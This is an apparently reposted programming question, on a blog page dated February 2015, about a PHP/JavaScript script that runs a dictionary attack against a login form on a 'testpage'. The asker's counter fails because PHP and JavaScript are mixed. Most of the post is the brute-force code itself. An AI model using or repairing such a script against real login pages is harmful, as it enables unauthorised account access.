dimanche 1 février 2015

PHP: Array doesn't use increased counter variable


I have written a script that tries to hack the login of a testpage with a dictionary attack. Normally the code has to work but the password list array doesn't use the increased counter variable. In line 4 the variable $filecounter_php is initialised with the value 0. An in line 41 I use this counter to get the next element from the password list array. An in line 43 I increase the counter variable.


In line 45 I call the function to check the next password if the last one was false. But in line 41 the array won't use the increased filecounter and it takes the first element (index 0) everytime.


So my question is: Why doesn't the array use the increased counter variable?


Many thanks in advance for your help! :-)



1 <html>
2    <head>
3        <?php
4        $filecounter_php = 0;
5        $pw_list = file("pw_list.txt");
6        ?>
7
8        <script type="text/javascript">
9
10        var filecounter_js = 0;
11       var filesize = 187428;
12       var password = "1337";
13
14        function dic_attack()
15        {
16            if (window.XMLHttpRequest)
17            {
18                var http = new XMLHttpRequest();
19                var b = document.getElementById("bdy");
20                var url = "index.php";
21                var params = params = "username=user123&password="+password;
22                http.open("POST", url, true);
23                //Send the proper header information along with the request
24                http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
25                //http.setRequestHeader("Content-length", params.length);
26                //http.setRequestHeader("Connection", "close");
27
28                http.onreadystatechange = function() 
29                {//Call a function when the state changes.
30                    if(http.readyState == 4 && http.status == 200) 
31                    {
32                        var response = http.responseText;
33                        if (response.search('SUCCESS') != -1)
34                        {
35                            b.innerHTML=http.responseText;
36                        }
37                        else
38                        {
39                            if (filecounter_js < filesize)
40                            {
41                                password = <?php echo "\"".trim(preg_replace('/\s\s+/', ' ', $pw_list[$filecounter_php]))."\""; ?>;
42                                b.innerHTML+="Trying: " + password + "..."+"<br>";
43                                <?php $filecounter_php = $filecounter_php + 1; ?>
44                                filecounter_js = filecounter_js + 1;
45                                dic_attack();
46                            }
47                            else
48                            {
49                                b = document.getElementById("bdy");
50                                b.innerHTML+="Couldn´t crack account!"+"<br>";
51                            }
52                        }
53                    }
54                }
55                http.send(params);
56            }
57        }
58        </script>
59    </head>
60    <body id="bdy">
61        <?php echo "<script type=\"text/javascript\">dic_attack();</script>"; ?>
62    </body>
63</html>




Publié par à
Libellés :

Aucun commentaire:

Enregistrer un commentaire

Inscription à : Publier les commentaires (Atom)